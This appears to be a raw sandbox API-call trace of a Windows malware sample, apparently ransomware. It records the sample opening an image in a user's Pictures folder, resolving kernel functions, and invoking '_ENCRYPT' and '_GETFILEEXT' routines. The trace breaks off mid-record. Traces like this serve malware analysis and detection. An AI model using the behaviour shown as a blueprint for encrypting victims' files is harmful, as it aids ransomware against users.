CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\hcaqljkeyc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=59, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x76) returned 0x7800d0 [0040.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=59, lpWideCharStr=0x7800d0, cchWideChar=59 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg") returned 59 [0040.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0040.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0040.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.712] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.713] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0040.713] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0040.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.714] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.715] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0040.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8895c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.715] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0040.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.715] CloseHandle (hObject=0x128) returned 1 [0040.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.716] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.716] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.717] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.717] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.717] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.717] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.717] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.717] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.717] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.717] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67638aa0, ftCreationTime.dwHighDateTime=0x1d5b857, ftLastAccessTime.dwLowDateTime=0x1b168b00, ftLastAccessTime.dwHighDateTime=0x1d5b5e8, ftLastWriteTime.dwLowDateTime=0x1b168b00, ftLastWriteTime.dwHighDateTime=0x1d5b5e8, nFileSizeHigh=0x0, nFileSizeLow=0xc43c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="HCAqLJKeYC.jpg", cAlternateFileName="HCAQLJ~1.JPG")) returned 0x7c20c0 [0040.717] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.717] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67638aa0, ftCreationTime.dwHighDateTime=0x1d5b857, ftLastAccessTime.dwLowDateTime=0x1b168b00, ftLastAccessTime.dwHighDateTime=0x1d5b5e8, ftLastWriteTime.dwLowDateTime=0x1b168b00, 